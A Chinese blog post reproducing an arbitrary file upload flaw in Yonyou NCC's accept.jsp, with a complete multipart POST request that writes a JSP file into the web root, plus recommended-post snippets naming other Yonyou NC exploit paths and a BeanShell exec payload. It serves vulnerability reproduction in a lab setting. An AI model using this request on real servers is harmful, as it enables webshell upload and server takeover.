用友ncc accept.jsp漏洞

已于 2023-03-23 12:03:54 修改
阅读量2.2k 收藏
点赞数
文章标签: 安全 php web安全 Powered by 金山文档
于 2023-03-15 15:48:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20737293/article/details/129557846
版权

漏洞原理

accept.jsp源码中设置了白名单和黑名单的代码,但是白名单代码被注释掉了(默认被注释)

只启用了黑名单。文件保存的函数fname又被定义为可以随便更改。

那可以上传白名单内的文件名,然后通过传参将文件保存的名字进行修改。以及修改文件位置

(具体源码不能够在平台展示出)

漏洞靶场复现

以下复现常见均在靶场上进行,请获得授权后在开展渗透

访问页面 http://ip:prot//aim/equipmap/accept.jsp

页面存在存在 则表明漏洞可能能够利用

通过POST发送数据包 

POST /aim/equipmap/accept.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 370
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------16314487820932200903769468567
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

-----------------------------16314487820932200903769468567
Content-Disposition: form-data; name="upload"; filename="test.txt"
Content-Type: text/plain

win
-----------------------------16314487820932200903769468567
Content-Disposition: form-data; name="fname"

\webapps\nc_web\test.jsp
-----------------------------16314487820932200903769468567--

解析一下请求的意思

这里值得注意的是 因为安装环境不同,所以可能会遇到保存的路径不一致的情况,这时候需要猜测服务器的路径。(但是默认为POC中的路径)

然后根据响应包是否包含parent.afterUpload(1)来判断文件是否上传成功

上传成功访问

以上复现均在靶场上实现!网络不是法外之地!请遵循中华人民共和国网络安全法

Chips.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
用友NCC设置UAP开启HTTPS
12-13
用友NCC设置UAP开启HTTPS
用友NCC2105/2111账号密码批量重置工具
06-06
用友NCC2105/2111账号密码批量重置工具,主要用于将需要重置密码的账号批量进行重置,如:将所有账号的密码全部重置为12345678c (注:需要安装.net4.0框架)
用友补丁安装步骤.pdf
05-08
用友补丁安装步骤.pdf用友补丁安装步骤.pdf用友补丁安装步骤.pdf用友补丁安装步骤.pdf用友补丁安装步骤.pdf
用友nc数据字典.xls
02-19
用友nc数据字典.xls
用友NC的一些漏洞复现
热门推荐
yzl_007的博客
12-15 1万+
用友NC的一些漏洞复现 一、BeanShell Test Servlet命令执行 漏洞介绍:用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。 影响范围:NC 6.5版本 复现过程: 访问对应网站后界面如下: 漏洞url就是:ip地址:端口/servlet/~ic/bsh.servlet.BshServlet 后续还可以写shell进去,但是这里不
用友NC 漏洞汇总(转载)
xiaobai_20190815的博客
11-21 8720
用友NC 漏洞汇总
用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801)
0xSec
06-29 9418
用友NCNC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器
用友全版本任意文件上传漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-26 1885
可以使用安全的文件验证机制,例如校验文件的魔术字节、文件头信息、文件结尾等,以确保上传的文件是预期的有效文件,并阻止上传恶意文件。限制文件上传:通过限制用户上传文件的类型、大小和目标路径,可以有效减少任意文件上传漏洞的风险。安全教育和培训:对系统管理员和用户进行安全教育和培训,提高其安全意识,让他们了解常见的安全威胁和最佳实践,以便正确地使用系统和应对潜在威胁。安全审计和监控:实施安全审计和监控机制,定期检查系统日志、访问日志和上传文件日志,及时发现异常活动和潜在的攻击行为。利用此漏洞需要俩段poc。
用友NC Cloud accept.jsp任意文件上传漏洞
CommputerMac的博客
11-08 338
NC Cloud是用友推出的大型企业数字化平台。用友网络科技股份有限公司NC Cloud存在任意文件上传漏洞,攻击者可利用该漏洞获取服务器控制权。
用友NC BeanShell RCE漏洞
qq_44484541的博客
11-01 729
用友 NC 是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。用友 NC 由于对外开放了 BeanShell 接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码从而获取服务器权限。该漏洞为第三方 Jar 包漏洞导致,用友 NC 官方已发布安全补丁,建议使用该产品的用户及时安装该漏洞补丁包。3.这里有执行代码的接口,输入payload如:exec(“whoami”);2.访问路径/servlet/~ic/bsh.servlet.BshServlet。
10.SSD SAD NCC算法.zip
12-25
立体匹配算法中的SSD SAD NCC算法,matelabe的
用友NC存在命令执行漏洞(CNVD-2021-30167)复现
嘟的博客
07-07 6857
漏洞说明: 2021年5月27日,国家信息安全漏洞共享平台(CNVD)公布了用友NC存在命令执行漏洞(CNVD-2021-30167),用友NC采用J2EE架构,面向大型企业集团和成长中的集团企业的信息化需求,为集团企业提供建模、开发、集成、运行、管理一体化的信息化解决方案。 2021年6月2日,用友公司发布了关于用友NC BeanShell远程代码执行漏洞的风险通告。由于用友NC对外开放了BeanShell的测试接口,未经身份验证的攻击者利用该测试接口,通过向目标服务器发送恶意构造的Http请求,在..
用友NC 漏洞
2301_80115097的博客
12-01 154
NCFindWeb?service=IPreAlertConfigService&filename=文件名。用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。if判断返回的数据出现index.html文件名则代表存在漏洞,否则不存在。在url处拼接poc后可以看到该站点的目录和文件。这里使用的是pocsuite3的poc模板。只需要修改_verify()部分即可。使用pocsuite3批量验证。
用友OA/NC/NCCloud SQL注入任意文件上传和读取RCE复现渗透测试记录
kelenwait的博客
06-23 7481
简介 用友公司成立于1988年,全面提供具有自主知识产权的企业管理/ERP软件、服务与解决方案,是中国最大的管理软件、ERP软件、集团管理软件、人力资源管理软件、客户关系管理软件及小型企业管理软件提供商。 漏洞情况 用友OA_U8 存在SQL 注入 用友NCCloud FS文件管理 SQL 注入 用友NC bsh.servlet.BshServlet 远程命令执行 用友NC 任意文件上传 getShell 漏洞复现 1.用友 OA_U8 SQL 注入 poc /yyoa/common/js/menu/tes
漏洞复现--用友NC accept.jsp任意文件上传
qq_53003652的博客
11-07 485
用友NC是大型企业管理与电子商务平台,帮助企业实现管理转型升级全面从以产品为中心转向以客户为中心(C2B);从流程驱动转向数据驱动(DDE);从延时运行转为实时运行(RTE);从领导指挥到员工创新(E2M)。用友NC accept.jsp处存在任意文件上传漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。上传成功,并且成功解析,可上传免杀马获得服务器权限。访问/test.jsp
用友OA/NC/NCCloud漏洞集合
qq_53229503的博客
08-16 7842
用友OA/NC/NCCloud漏洞集合
用友NCNC Cloud MxServlet反序列化漏洞复现
0xSec
11-15 1801
用友NCNC Cloud系统存在反序列化漏洞,系统未将用户传入的序列化数据进行过滤就直接执行了反序列化操作,结合系统本身存在的反序列化利用链,可造成了命令执行,深入利用可随意操作服务器。
ncc2020.05的自由报表文档
最新发布
02-05
ncc2020.05的自由报表文档是公司每月的财务报告,以便于管理层了解公司的财务状况和经营情况。该文档包含了许多重要的财务数据和指标,用于评估公司的盈利能力和稳定性。 首先,自由报表文档会列出公司的收入和支出情况。收入部分会详细列出各项业务的销售收入,例如不同产品或服务的销售额,以及不同地区或客户组的销售额。支出部分会列出各项费用,如人力资源费用、营销费用、研发费用以及运营费用等。 其次,自由报表文档还会显示公司的利润情况。这包括营业利润、税前利润和净利润等指标。这些数字能够让管理层了解公司的盈利水平,以及核心业务的盈利能力。 此外,自由报表文档还会包括资产和负债情况。资产表会列出公司的各项资产,如现金、应收账款、存货、固定资产等。负债表则会列出公司的各项负债,如应付账款、短期借款、长期借款等。通过比较资产和负债的关系,我们可以评估公司的财务健康状况和偿债能力。 最后,自由报表文档还会提供现金流量表。这表明了现金的流入和流出情况,包括经营活动、投资活动和筹资活动。通过分析现金流量表,我们可以了解公司的资金运作状况,以及现金的流动性和稳定性。 综上所述,ncc2020.05的自由报表文档提供了公司财务状况和经营情况的详细信息,以帮助管理层做出决策并评估公司的运营表现。这对公司的长期发展和管理至关重要。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值